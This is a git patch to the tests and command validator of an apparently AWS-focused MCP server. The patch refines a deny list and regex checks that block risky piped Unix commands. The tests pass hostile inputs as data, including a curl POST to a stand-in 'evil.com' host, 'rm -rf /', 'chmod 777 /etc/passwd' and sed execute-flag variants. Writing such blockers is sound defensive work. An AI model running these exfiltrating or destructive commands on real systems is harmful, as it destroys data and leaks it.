b/tests/unit/test_config.py @@ -0,0 +1,82 @@ +"""Tests for the config module.""" + +import os +from unittest.mock import mock_open, patch + +from aws_mcp_server.config import ( + check_security_warnings, + is_running_in_docker, +) + + +def test_is_running_in_docker_dockerenv_exists(): + """Test Docker detection via .dockerenv file.""" + with patch("pathlib.Path.exists", return_value=True): + assert is_running_in_docker() is True + + +def test_is_running_in_docker_cgroup_docker(): + """Test Docker detection via cgroup file containing 'docker'.""" + with patch("pathlib.Path.exists", return_value=False): + with patch("builtins.open", mock_open(read_data="12:memory:/docker/abc123")): + assert is_running_in_docker() is True + + +def test_is_running_in_docker_cgroup_containerd(): + """Test Docker detection via cgroup file containing 'containerd'.""" + with patch("pathlib.Path.exists", return_value=False): + with patch( + "builtins.open", mock_open(read_data="12:memory:/containerd/abc123") + ): + assert is_running_in_docker() is True + + +def test_is_running_in_docker_container_env_var(): + """Test Docker detection via container environment variable.""" + with patch("pathlib.Path.exists", return_value=False): + with patch("builtins.open", side_effect=FileNotFoundError()): + with patch.dict(os.environ, {"container": "docker"}): + assert is_running_in_docker() is True + + +def test_is_running_in_docker_not_in_docker(): + """Test Docker detection when not running in Docker.""" + with patch("pathlib.Path.exists", return_value=False): + with patch("builtins.open", side_effect=FileNotFoundError()): + with patch.dict(os.environ, {}, clear=True): + # Also need to make sure 'container' key doesn't exist + env_copy = os.environ.copy() + env_copy.pop("container", None) + with patch.dict(os.environ, env_copy, clear=True): + assert is_running_in_docker() is False + + +def test_check_security_warnings_outside_docker_strict(): + """Test security warnings when running outside Docker in strict mode.""" + with patch("aws_mcp_server.config.is_running_in_docker", return_value=False): + with patch("aws_mcp_server.config.SECURITY_MODE", "strict"): + with patch("aws_mcp_server.config.logger.warning") as mock_warning: + check_security_warnings() + mock_warning.assert_called_once() + assert "SECURITY WARNING" in mock_warning.call_args[0][0] + assert "Docker" in mock_warning.call_args[0][0] + + +def test_check_security_warnings_permissive_mode(): + """Test security warnings in permissive mode.""" + with patch("aws_mcp_server.config.is_running_in_docker", return_value=True): + with patch("aws_mcp_server.config.SECURITY_MODE", "permissive"): + with patch("aws_mcp_server.config.logger.warning") as mock_warning: + check_security_warnings() + mock_warning.assert_called_once() + assert "PERMISSIVE" in mock_warning.call_args[0][0] + + +def test_check_security_warnings_docker_strict_recommended(): + """Test security status message when running in Docker with strict mode.""" + with patch("aws_mcp_server.config.is_running_in_docker", return_value=True): + with patch("aws_mcp_server.config.SECURITY_MODE", "strict"): + with patch("aws_mcp_server.config.logger.info") as mock_info: + check_security_warnings() + mock_info.assert_called_once() + assert "recommended configuration" in mock_info.call_args[0][0] diff --git a/tests/unit/test_security.py b/tests/unit/test_security.py index 0d01680..6981744 100644 --- a/tests/unit/test_security.py +++ b/tests/unit/test_security.py @@ -32,7 +32,10 @@ def test_is_service_command_safe(): assert is_service_command_safe("aws s3 rb s3://my-bucket", "s3") is False # Test with unknown service - assert is_service_command_safe("aws unknown-service command", "unknown-service") is False + assert ( + is_service_command_safe("aws unknown-service command", "unknown-service") + is False + ) def test_check_regex_rules(): @@ -118,7 +121,9 @@ def test_validate_aws_command_regex(): with patch("aws_mcp_server.security.check_regex_rules") as mock_check: mock_check.return_value = "Using sensitive profiles is restricted" - with pytest.raises(ValueError, match="Using sensitive profiles is restricted"): + with pytest.raises( + ValueError, match="Using sensitive profiles is restricted" + ): validate_aws_command(profile_command) # Verify check_regex_rules was called @@ -129,7 +134,9 @@ def test_validate_aws_command_regex(): # Have the mock return error for the policy command mock_check.return_value = "Creating public bucket policies is restricted" - with pytest.raises(ValueError, match="Creating public bucket policies is restricted"): + with pytest.raises( + ValueError, match="Creating public bucket policies is restricted" + ): validate_aws_command(policy_command) # Verify check_regex_rules was called @@ -148,35 +155,32 @@ def test_validate_aws_command_permissive(): @patch("aws_mcp_server.security.SECURITY_MODE", "strict") def test_validate_pipe_command(): """Test validation of piped commands.""" - # Mock the validate_aws_command and validate_unix_command functions with patch("aws_mcp_server.security.validate_aws_command") as mock_aws_validate: - with patch("aws_mcp_server.security.validate_unix_command") as mock_unix_validate: - # Set up return values - mock_unix_validate.return_value = True - - # Test valid piped command - validate_pipe_command("aws s3 ls | grep bucket") - mock_aws_validate.assert_called_once_with("aws s3 ls") + with patch( + "aws_mcp_server.security.ALLOWED_UNIX_COMMANDS", {"grep", "head", "tail"} + ): + with patch( + "aws_mcp_server.security.check_dangerous_patterns", return_value=None + ): + # Test valid piped command + validate_pipe_command("aws s3 ls | grep bucket") + mock_aws_validate.assert_called_once_with("aws s3 ls") - # Reset mocks - mock_aws_validate.reset_mock() - mock_unix_validate.reset_mock() + mock_aws_validate.reset_mock() - # Test command with unrecognized Unix command - mock_unix_validate.return_value = False - with pytest.raises(ValueError, match="not allowed"): - validate_pipe_command("aws s3 ls | unknown_command") + # Test command with unrecognized Unix command + with pytest.raises(ValueError, match="not allowed"): + validate_pipe_command("aws s3 ls | unknown_command") - # Empty command should raise - with pytest.raises(ValueError, match="Empty command"): - validate_pipe_command("") + # Empty command should raise + with pytest.raises(ValueError, match="Empty command"): + validate_pipe_command("") - # Empty second command test - # Configure split_pipe_command to return a list with an empty second command - with patch("aws_mcp_server.security.split_pipe_command") as mock_split_pipe: - mock_split_pipe.return_value = ["aws s3 ls", ""] - with pytest.raises(ValueError, match="Empty command at position"): - validate_pipe_command("aws s3 ls | ") + # Empty second command test + with patch("aws_mcp_server.security.split_pipe_command") as mock_split_pipe: + mock_split_pipe.return_value = ["aws s3 ls", ""] + with pytest.raises(ValueError, match="Empty command at position"): + validate_pipe_command("aws s3 ls | ") @patch("aws_mcp_server.security.SECURITY_MODE", "strict") @@ -214,7 +218,15 @@ def test_load_security_config_custom(): test_config = { "dangerous_commands": {"test_service": ["aws test_service dangerous_command"]}, "safe_patterns": {"test_service": ["aws test_service safe_pattern"]}, - "regex_rules": {"test_service": [{"pattern": "test_pattern", "description": "Test description", "error_message": "Test error message"}]}, + "regex_rules": { + "test_service": [ + { + "pattern": "test_pattern", + "description": "Test description", + "error_message": "Test error message", + } + ] + }, } # Mock the open function to return our test config @@ -236,7 +248,9 @@ def test_load_security_config_error(): with patch("aws_mcp_server.security.SECURITY_CONFIG_PATH", "/fake/path.yaml"): with patch("pathlib.Path.exists", return_value=True): with patch("aws_mcp_server.security.logger.error") as mock_error: - with patch("aws_mcp_server.security.logger.warning") as mock_warning: + with patch( + "aws_mcp_server.security.logger.warning" + ) as mock_warning: config = load_security_config() # Should log error and warning @@ -250,7 +264,9 @@ def test_load_security_config_error(): def test_reload_security_config(): """Test reloading security configuration.""" with patch("aws_mcp_server.security.load_security_config") as mock_load: - mock_load.return_value = SecurityConfig(dangerous_commands={"test": ["test"]}, safe_patterns={"test": ["test"]}) + mock_load.return_value = SecurityConfig( + dangerous_commands={"test": ["test"]}, safe_patterns={"test": ["test"]} + ) reload_security_config() @@ -265,7 +281,11 @@ def test_specific_dangerous_commands(): # Configure the SECURITY_CONFIG with some dangerous commands with patch("aws_mcp_server.security.SECURITY_CONFIG") as mock_config: mock_config.dangerous_commands = { - "iam": ["aws iam create-user", "aws iam create-access-key", "aws iam attach-user-policy"], + "iam": [ + "aws iam create-user", + "aws iam create-access-key", + "aws iam attach-user-policy", + ], "ec2": ["aws ec2 terminate-instances"], "s3": ["aws s3 rb"], "rds": ["aws rds delete-db-instance"], @@ -286,7 +306,9 @@ def test_specific_dangerous_commands(): validate_aws_command("aws iam create-access-key --user-name test-user") with pytest.raises(ValueError, match="restricted for security reasons"): - validate_aws_command("aws iam attach-user-policy --user-name test-user --policy-arn arn:aws:iam::aws:policy/AdministratorAccess") + validate_aws_command( + "aws iam attach-user-policy --user-name test-user --policy-arn arn:aws:iam::aws:policy/AdministratorAccess" + ) # EC2 dangerous commands with pytest.raises(ValueError, match="restricted for security reasons"): @@ -298,7 +320,9 @@ def test_specific_dangerous_commands(): # RDS dangerous commands with pytest.raises(ValueError, match="restricted for security reasons"): - validate_aws_command("aws rds delete-db-instance --db-instance-identifier my-db --skip-final-snapshot") + validate_aws_command( + "aws rds delete-db-instance --db-instance-identifier my-db --skip-final-snapshot" + ) # Tests for safe patterns overriding dangerous commands @@ -342,7 +366,9 @@ def test_complex_regex_patterns(): with patch("aws_mcp_server.security.check_regex_rules") as mock_check: # Set up mock to return error for the dangerous command - mock_check.side_effect = lambda cmd, svc=None: "Security group error" if "--port 22" in cmd else None + mock_check.side_effect = lambda cmd, svc=None: ( + "Security group error" if "--port 22" in cmd else None + ) # Test dangerous command raises error with pytest.raises(ValueError, match="Security group error"): @@ -352,3 +378,76 @@ def test_complex_regex_patterns(): mock_check.reset_mock() mock_check.return_value = None # Explicit safe return validate_aws_command(safe_sg_command_80) # Should not raise + + +@patch("aws_mcp_server.security.SECURITY_MODE", "strict") +def test_is_service_command_safe_general_pattern(): + """Test that general safe patterns work across services.""" + with patch("aws_mcp_server.security.SECURITY_CONFIG") as mock_config: + mock_config.safe_patterns = { + "s3": ["aws s3 ls"], + "general": ["--help", "help"], + } + mock_config.dangerous_commands = {} + + # General safe pattern should match + assert ( + is_service_command_safe("aws ec2 describe-instances --help", "ec2") is True + ) + assert is_service_command_safe("aws iam help", "iam") is True + + +@patch("aws_mcp_server.security.SECURITY_MODE", "strict") +def test_check_regex_rules_service_specific(): + """Test service-specific regex rules.""" + with patch("aws_mcp_server.security.SECURITY_CONFIG") as mock_config: + mock_config.regex_rules = { + "general": [], + "iam": [ + ValidationRule( + pattern=r"--user-name\s+(root|admin)", + description="Prevent creating users with sensitive names", + error_message="Creating users with sensitive names is restricted", + regex=True, + ) + ], + } + + # Should match service-specific rule + error = check_regex_rules("aws iam create-user --user-name admin", "iam") + assert error is not None + assert "sensitive names" in error + + # Should not match for different service + error = check_regex_rules("aws iam create-user --user-name admin", "ec2") + assert error is None + + +@patch("aws_mcp_server.security.SECURITY_MODE", "permissive") +def test_validate_pipe_command_permissive_mode(): + """Test that pipe command validation is skipped in permissive mode.""" + with patch("aws_mcp_server.security.logger.warning") as mock_warning: + # This would normally fail validation but should pass in permissive mode + validate_pipe_command("aws s3 ls | grep bucket") + mock_warning.assert_called_once() + assert "permissive" in mock_warning.call_args[0][0].lower() + + +@patch("aws_mcp_server.security.SECURITY_MODE", "strict") +def test_validate_pipe_command_dangerous_patterns(): + """Test that dangerous patterns in Unix commands are blocked.""" + with patch("aws_mcp_server.security.check_dangerous_patterns") as mock_check: + mock_check.return_value = "Dangerous option detected" + + with pytest.raises(ValueError, match="Security violation"): + validate_pipe_command("aws s3 ls | grep -r /") + + +@patch("aws_mcp_server.security.SECURITY_MODE", "permissive") +def test_validate_command_permissive_mode(): + """Test that command validation is skipped in permissive mode.""" + with patch("aws_mcp_server.security.logger.warning") as mock_warning: + # This would normally fail validation but should pass in permissive mode + validate_command("aws iam create-user --user-name test") + mock_warning.assert_called_once() + assert "permissive" in mock_warning.call_args[0][0].lower() diff --git a/tests/unit/test_tools.py b/tests/unit/test_tools.py index ef9c278..a97e096 100644 --- a/tests/unit/test_tools.py +++ b/tests/unit/test_tools.py @@ -7,6 +7,7 @@ from aws_mcp_server.tools import ( ALLOWED_UNIX_COMMANDS, + check_dangerous_patterns, execute_piped_command, is_pipe_command, split_pipe_command, @@ -45,7 +46,9 @@ def test_is_pipe_command(): # Test commands with pipes in quotes (should not be detected as pipe commands) assert not is_pipe_command("aws s3 ls 's3://my-bucket/file|other'") - assert not is_pipe_command('aws ec2 run-instances --user-data "echo hello | grep world"') + assert not is_pipe_command( + 'aws ec2 run-instances --user-data "echo hello | grep world"' + ) # Test commands with escaped quotes - these should not confuse the parser assert is_pipe_command('aws s3 ls --query "Name=\\"value\\"" | grep bucket') @@ -88,7 +91,9 @@ def test_split_pipe_command(): @pytest.mark.asyncio async def test_execute_piped_command_success(): """Test successful execution of a piped command.""" - with patch("asyncio.create_subprocess_exec", new_callable=AsyncMock) as mock_subprocess: + with patch( + "asyncio.create_subprocess_exec", new_callable=AsyncMock + ) as mock_subprocess: # Mock the first process in the pipe first_process_mock = AsyncMock() first_process_mock.returncode = 0 @@ -108,16 +113,30 @@ async def test_execute_piped_command_success(): assert result["output"] == "Filtered output" # Verify first command was called with correct args - mock_subprocess.assert_any_call("aws", "s3", "ls", stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE) + mock_subprocess.assert_any_call( + "aws", + "s3", + "ls", + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, + ) # Verify second command was called with correct args - mock_subprocess.assert_any_call("grep", "bucket", stdin=asyncio.subprocess.PIPE, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE) + mock_subprocess.assert_any_call( + "grep", + "bucket", + stdin=asyncio.subprocess.PIPE, + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, + ) @pytest.mark.asyncio async def test_execute_piped_command_error_first_command(): """Test error handling in execute_piped_command when first command fails.""" - with patch("asyncio.create_subprocess_exec", new_callable=AsyncMock) as mock_subprocess: + with patch( + "asyncio.create_subprocess_exec", new_callable=AsyncMock + ) as mock_subprocess: # Mock a failed first process process_mock = AsyncMock() process_mock.returncode = 1 @@ -133,7 +152,9 @@ async def test_execute_piped_command_error_first_command(): @pytest.mark.asyncio async def test_execute_piped_command_error_second_command(): """Test error handling in execute_piped_command when second command fails.""" - with patch("asyncio.create_subprocess_exec", new_callable=AsyncMock) as mock_subprocess: + with patch( + "asyncio.create_subprocess_exec", new_callable=AsyncMock + ) as mock_subprocess: # Mock the first process in the pipe (success) first_process_mock = AsyncMock() first_process_mock.returncode = 0 @@ -156,7 +177,9 @@ async def test_execute_piped_command_error_second_command(): @pytest.mark.asyncio async def test_execute_piped_command_timeout(): """Test timeout handling in execute_piped_command.""" - with patch("asyncio.create_subprocess_exec", new_callable=AsyncMock) as mock_subprocess: + with patch( + "asyncio.create_subprocess_exec", new_callable=AsyncMock + ) as mock_subprocess: # Mock a process that times out process_mock = AsyncMock() # Use a properly awaitable mock that raises TimeoutError @@ -176,7 +199,9 @@ async def test_execute_piped_command_timeout(): @pytest.mark.asyncio async def test_execute_piped_command_exception(): """Test general exception handling in execute_piped_command.""" - with patch("asyncio.create_subprocess_exec", side_effect=Exception("Test exception")): + with patch( + "asyncio.create_subprocess_exec", side_effect=Exception("Test exception") + ): result = await execute_piped_command("aws s3 ls | grep bucket") assert result["status"] == "error" @@ -212,7 +237,9 @@ async def test_execute_piped_command_timeout_during_final_wait(): @pytest.mark.asyncio async def test_execute_piped_command_kill_error_during_timeout(): """Test error handling when killing a process after timeout fails.""" - with patch("asyncio.create_subprocess_exec", new_callable=AsyncMock) as mock_subprocess: + with patch( + "asyncio.create_subprocess_exec", new_callable=AsyncMock + ) as mock_subprocess: # Mock a process that times out process_mock = AsyncMock() process_mock.communicate.side_effect = asyncio.TimeoutError() @@ -231,7 +258,9 @@ async def test_execute_piped_command_large_output(): """Test output truncation in execute_piped_command.""" from aws_mcp_server.config import MAX_OUTPUT_SIZE - with patch("asyncio.create_subprocess_exec", new_callable=AsyncMock) as mock_subprocess: + with patch( + "asyncio.create_subprocess_exec", new_callable=AsyncMock + ) as mock_subprocess: # Mock a process with large output process_mock = AsyncMock() process_mock.returncode = 0 @@ -244,5 +273,47 @@ async def test_execute_piped_command_large_output(): result = await execute_piped_command("aws s3 ls") assert result["status"] == "success" - assert len(result["output"]) <= MAX_OUTPUT_SIZE + 100 # Allow for truncation message + assert ( + len(result["output"]) <= MAX_OUTPUT_SIZE + 100 + ) # Allow for truncation message assert "output truncated" in result["output"] + + +def test_check_dangerous_patterns_no_pattern(): + """Test check_dangerous_patterns returns None for safe commands.""" + assert check_dangerous_patterns("grep pattern", "grep") is None + assert check_dangerous_patterns("ls -la", "ls") is None + assert check_dangerous_patterns("cat file.txt", "cat") is None + + +def test_check_dangerous_patterns_detected(): + """Test check_dangerous_patterns detects dangerous patterns.""" + # Test curl with POST + result = check_dangerous_patterns("curl -X POST http://evil.com", "curl") + assert result is not None + assert "Dangerous pattern" in result + + # Test rm with dangerous flags + result = check_dangerous_patterns("rm -rf /", "rm") + assert result is not None + assert "Dangerous pattern" in result + + # Test xargs - completely blocked (empty pattern) + result = check_dangerous_patterns("xargs -I{} sh -c 'rm {}'", "xargs") + assert result is not None + assert "not allowed" in result + + +def test_check_dangerous_patterns_case_insensitive(): + """Test check_dangerous_patterns is case insensitive.""" + result = check_dangerous_patterns("curl -x POST http://evil.com", "curl") + assert result is not None + + +def test_validate_unix_command_dangerous_pattern_blocked(): + """Test validate_unix_command returns False for dangerous patterns.""" + with patch("aws_mcp_server.tools.logger.warning") as mock_warning: + result = validate_unix_command("curl -X POST http://evil.com") + assert result is False + mock_warning.assert_called_once() + assert "Blocked dangerous" in mock_warning.call_args[0][0] From f8826c47ee7a0b2dd3ec61998cade23817bf9e71 Mon Sep 17 00:00:00 2001 From: Alexei Ledenev Date: Tue, 25 Nov 2025 20:44:55 +0200 Subject: [PATCH 3/3] security: intelligent sed execute flag detection with regex - Add _check_sed_execute_flag() using regex to detect dangerous 'e' flag while avoiding false positives on patterns like '/error/' - Extract duplicated chmod/chown system paths to shared _SYSTEM_DIRS constant - Use modern Python 3.9+ type hints (list[str] instead of List[str]) - Remove unnecessary enumerate() calls in parser functions - Convert repetitive dangerous pattern tests to parameterized table-driven tests --- src/aws_mcp_server/tools.py | 144 ++++++++++++++++++++++++++---------- tests/unit/test_tools.py | 77 ++++++++++++------- 2 files changed, 152 insertions(+), 69 deletions(-) diff --git a/src/aws_mcp_server/tools.py b/src/aws_mcp_server/tools.py index 1ab004c..bb8165c 100644 --- a/src/aws_mcp_server/tools.py +++ b/src/aws_mcp_server/tools.py @@ -8,8 +8,9 @@ import asyncio import logging +import re import shlex -from typing import List, TypedDict +from typing import TypedDict from aws_mcp_server.config import DEFAULT_TIMEOUT, MAX_OUTPUT_SIZE @@ -118,12 +119,7 @@ class CommandResult(TypedDict): "xargs": [ "", # Block all xargs usage - it's designed to execute commands ], - # sed can execute commands in some versions via the 'e' command - "sed": [ - "/e", # Execute pattern space as shell command (GNU sed) - " e", # Execute command flag - ";e", # Execute after other command - ], + # NOTE: sed is handled by _check_sed_execute_flag() for intelligent detection # curl/wget data exfiltration via POST/upload "curl": [ "-X POST", # POST requests could exfiltrate data @@ -147,23 +143,50 @@ class CommandResult(TypedDict): "-rf ~", # Recursive force delete home "--no-preserve-root", # Allow deleting root ], - # chmod/chown on sensitive paths - "chmod": [ - " /", # Modifying root or system files - " /etc", - " /usr", - " /bin", - " /sbin", - ], - "chown": [ - " /", # Modifying root or system files - " /etc", - " /usr", - " /bin", - " /sbin", - ], } +# System directories that should not be modified by chmod/chown +# NOTE: We only block specific system directories, not all absolute paths +# This allows legitimate uses like: chmod 400 /tmp/key.pem +_SYSTEM_DIRS = ["etc", "usr", "bin", "sbin", "lib", "lib64", "boot", "sys", "proc"] +_SYSTEM_PATH_PATTERNS = [f" /{d}/" for d in _SYSTEM_DIRS] + [ + f" /{d} " for d in _SYSTEM_DIRS +] + +# Add chmod/chown patterns +DANGEROUS_UNIX_PATTERNS["chmod"] = _SYSTEM_PATH_PATTERNS +DANGEROUS_UNIX_PATTERNS["chown"] = _SYSTEM_PATH_PATTERNS + + +def _check_sed_execute_flag(command: str) -> str | None: + """Check if a sed command contains the dangerous 'e' execute flag. + + The sed 'e' flag executes the pattern space as a shell command. + We detect 'e' in the flags section (after the last delimiter) by looking + for /[flags]e[flags] where flags are common sed modifiers (g,i,p,w,m,I,M). + + Args: + command: The full sed command string + + Returns: + Error message if dangerous execute flag found, None otherwise + """ + # Pattern: / followed by optional flags, then 'e', then optional flags, + # NOT followed by alphanumeric (to exclude patterns like /error/) + # Common sed flags: g (global), i/I (case-insensitive), p (print), + # w (write), m/M (multiline), e (execute) + # This catches: /e, /ge, /eg, /gei, /peg, etc. + # But NOT: /error/, /enable/ (e followed by alphanumeric) + if re.search(r"/[gipwmIM]*e[gipwmIM]*(?![a-zA-Z0-9])", command): + return "Dangerous sed 'e' (execute) flag detected - executes shell commands" + + # Also check for standalone 'e' command after semicolon: p;e, d;e + # Pattern: ;e followed by non-alphanumeric or end of string + if re.search(r";e(?![a-zA-Z0-9])", command): + return "Dangerous sed 'e' (execute) command detected - executes shell commands" + + return None + def check_dangerous_patterns(command: str, cmd_name: str) -> str | None: """Check if a command contains dangerous patterns. @@ -175,6 +198,10 @@ def check_dangerous_patterns(command: str, cmd_name: str) -> str | None: Returns: Error message if dangerous pattern found, None otherwise """ + # Special handling for sed - use intelligent regex detection + if cmd_name == "sed": + return _check_sed_execute_flag(command) + if cmd_name not in DANGEROUS_UNIX_PATTERNS: return None @@ -237,7 +264,7 @@ def is_pipe_command(command: str) -> bool: in_double_quote = False escaped = False - for _, char in enumerate(command): + for char in command: # Handle escape sequences if char == "\\" and not escaped: escaped = True @@ -256,7 +283,7 @@ def is_pipe_command(command: str) -> bool: return False -def split_pipe_command(pipe_command: str) -> List[str]: +def split_pipe_command(pipe_command: str) -> list[str]: """Split a piped command into individual commands. Args: @@ -271,7 +298,7 @@ def split_pipe_command(pipe_command: str) -> List[str]: in_double_quote = False escaped = False - for _, char in enumerate(pipe_command): + for char in pipe_command: # Handle escape sequences if char == "\\" and not escaped: escaped = True @@ -301,7 +328,9 @@ def split_pipe_command(pipe_command: str) -> List[str]: return commands -async def execute_piped_command(pipe_command: str, timeout: int | None = None) -> CommandResult: +async def execute_piped_command( + pipe_command: str, timeout: int | None = None +) -> CommandResult: """Execute a command that contains pipes. Args: @@ -329,7 +358,9 @@ async def execute_piped_command(pipe_command: str, timeout: int | None = None) - # Execute the first command first_cmd = command_parts_list[0] - first_process = await asyncio.create_subprocess_exec(*first_cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE) + first_process = await asyncio.create_subprocess_exec( + *first_cmd, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE + ) current_process = first_process current_stdout = None @@ -339,47 +370,69 @@ async def execute_piped_command(pipe_command: str, timeout: int | None = None) - for cmd_parts in command_parts_list[1:]: try: # Wait for the previous command to complete with timeout - current_stdout, current_stderr = await asyncio.wait_for(current_process.communicate(), timeout) + current_stdout, current_stderr = await asyncio.wait_for( + current_process.communicate(), timeout + ) if current_process.returncode != 0: # If previous command failed, stop the pipe execution stderr_str = current_stderr.decode("utf-8", errors="replace") - logger.warning(f"Piped command failed with return code {current_process.returncode}: {pipe_command}") + logger.warning( + f"Piped command failed with return code {current_process.returncode}: {pipe_command}" + ) logger.debug(f"Command error output: {stderr_str}") - return CommandResult(status="error", output=stderr_str or "Command failed with no error output") + return CommandResult( + status="error", + output=stderr_str or "Command failed with no error output", + ) # Create the next process with the previous output as input next_process = await asyncio.create_subprocess_exec( - *cmd_parts, stdin=asyncio.subprocess.PIPE, stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE + *cmd_parts, + stdin=asyncio.subprocess.PIPE, + stdout=asyncio.subprocess.PIPE, + stderr=asyncio.subprocess.PIPE, ) # Pass the output of the previous command to the input of the next command - stdout, stderr = await asyncio.wait_for(next_process.communicate(input=current_stdout), timeout) + stdout, stderr = await asyncio.wait_for( + next_process.communicate(input=current_stdout), timeout + ) current_process = next_process current_stdout = stdout current_stderr = stderr except asyncio.TimeoutError: - logger.warning(f"Piped command timed out after {timeout} seconds: {pipe_command}") + logger.warning( + f"Piped command timed out after {timeout} seconds: {pipe_command}" + ) try: # process.kill() is synchronous, not a coroutine current_process.kill() except Exception as e: logger.error(f"Error killing process: {e}") - return CommandResult(status="error", output=f"Command timed out after {timeout} seconds") + return CommandResult( + status="error", output=f"Command timed out after {timeout} seconds" + ) # Wait for the final command to complete if it hasn't already if current_stdout is None: try: - current_stdout, current_stderr = await asyncio.wait_for(current_process.communicate(), timeout) + current_stdout, current_stderr = await asyncio.wait_for( + current_process.communicate(), timeout + ) except asyncio.TimeoutError: - logger.warning(f"Piped command timed out after {timeout} seconds: {pipe_command}") + logger.warning( + f"Piped command timed out after {timeout} seconds: {pipe_command}" + ) try: current_process.kill() except Exception as e: logger.error(f"Error killing process: {e}") - return CommandResult(status="error", output=f"Command timed out after {timeout} seconds") + return CommandResult( + status="error", output=f"Command timed out after {timeout} seconds" + ) # Process output stdout_str = current_stdout.decode("utf-8", errors="replace") @@ -387,15 +440,24 @@ async def execute_piped_command(pipe_command: str, timeout: int | None = None) - # Truncate output if necessary if len(stdout_str) > MAX_OUTPUT_SIZE: - logger.info(f"Output truncated from {len(stdout_str)} to {MAX_OUTPUT_SIZE} characters") + logger.info( + f"Output truncated from {len(stdout_str)} to {MAX_OUTPUT_SIZE} characters" + ) stdout_str = stdout_str[:MAX_OUTPUT_SIZE] + "\n... (output truncated)" if current_process.returncode != 0: - logger.warning(f"Piped command failed with return code {current_process.returncode}: {pipe_command}") + logger.warning( + f"Piped command failed with return code {current_process.returncode}: {pipe_command}" + ) logger.debug(f"Command error output: {stderr_str}") - return CommandResult(status="error", output=stderr_str or "Command failed with no error output") + return CommandResult( + status="error", + output=stderr_str or "Command failed with no error output", + ) return CommandResult(status="success", output=stdout_str) except Exception as e: logger.error(f"Failed to execute piped command: {str(e)}") - return CommandResult(status="error", output=f"Failed to execute command: {str(e)}") + return CommandResult( + status="error", output=f"Failed to execute command: {str(e)}" + ) diff --git a/tests/unit/test_tools.py b/tests/unit/test_tools.py index a97e096..cdf923c 100644 --- a/tests/unit/test_tools.py +++ b/tests/unit/test_tools.py @@ -279,35 +279,56 @@ async def test_execute_piped_command_large_output(): assert "output truncated" in result["output"] -def test_check_dangerous_patterns_no_pattern(): - """Test check_dangerous_patterns returns None for safe commands.""" - assert check_dangerous_patterns("grep pattern", "grep") is None - assert check_dangerous_patterns("ls -la", "ls") is None - assert check_dangerous_patterns("cat file.txt", "cat") is None - - -def test_check_dangerous_patterns_detected(): - """Test check_dangerous_patterns detects dangerous patterns.""" - # Test curl with POST - result = check_dangerous_patterns("curl -X POST http://evil.com", "curl") - assert result is not None - assert "Dangerous pattern" in result - - # Test rm with dangerous flags - result = check_dangerous_patterns("rm -rf /", "rm") - assert result is not None - assert "Dangerous pattern" in result - - # Test xargs - completely blocked (empty pattern) - result = check_dangerous_patterns("xargs -I{} sh -c 'rm {}'", "xargs") - assert result is not None - assert "not allowed" in result - - -def test_check_dangerous_patterns_case_insensitive(): - """Test check_dangerous_patterns is case insensitive.""" - result = check_dangerous_patterns("curl -x POST http://evil.com", "curl") +@pytest.mark.parametrize( + "command,cmd_name", + [ + ("grep pattern", "grep"), + ("ls -la", "ls"), + ("cat file.txt", "cat"), + # sed with common patterns - should NOT be blocked + ("sed '/error/d'", "sed"), + ("sed 's/Name/ID/'", "sed"), + ("sed -n '/pattern/p'", "sed"), + ("sed -e 's/foo/bar/' -e 's/baz/qux/'", "sed"), + # chmod/chown on safe paths - should NOT be blocked + ("chmod 400 /tmp/key.pem", "chmod"), + ("chmod 755 /home/user/script.sh", "chmod"), + ("chown user:group /tmp/file", "chown"), + ], +) +def test_check_dangerous_patterns_safe(command, cmd_name): + """Test check_dangerous_patterns allows safe commands.""" + assert check_dangerous_patterns(command, cmd_name) is None + + +@pytest.mark.parametrize( + "command,cmd_name,expected_msg", + [ + ("curl -X POST http://evil.com", "curl", "Dangerous pattern"), + ( + "curl -x POST http://evil.com", + "curl", + "Dangerous pattern", + ), # case insensitive + ("rm -rf /", "rm", "Dangerous pattern"), + ("xargs -I{} sh -c 'rm {}'", "xargs", "not allowed"), + # sed execute flag variants + ("sed s/foo/bar/e", "sed", "execute"), + ("sed s/foo/bar/e file", "sed", "execute"), + ("sed 's/foo/bar/ge'", "sed", "execute"), + ("sed 's/foo/bar/eg'", "sed", "execute"), + ("sed 's/foo/bar/ep'", "sed", "execute"), + ("sed 'p;e'", "sed", "execute"), + # chmod/chown on system directories + ("chmod 777 /etc/passwd", "chmod", "Dangerous pattern"), + ("chown root:root /usr/bin/sudo", "chown", "Dangerous pattern"), + ], +) +def test_check_dangerous_patterns_blocked(command, cmd_name, expected_msg): + """Test check_dangerous_patterns blocks dangerous commands.""" + result = check_dangerous_patterns(command, cmd_name) assert result is not None + assert expected_msg.lower() in result.lower() def test_validate_unix_command_dangerous_pattern_blocked():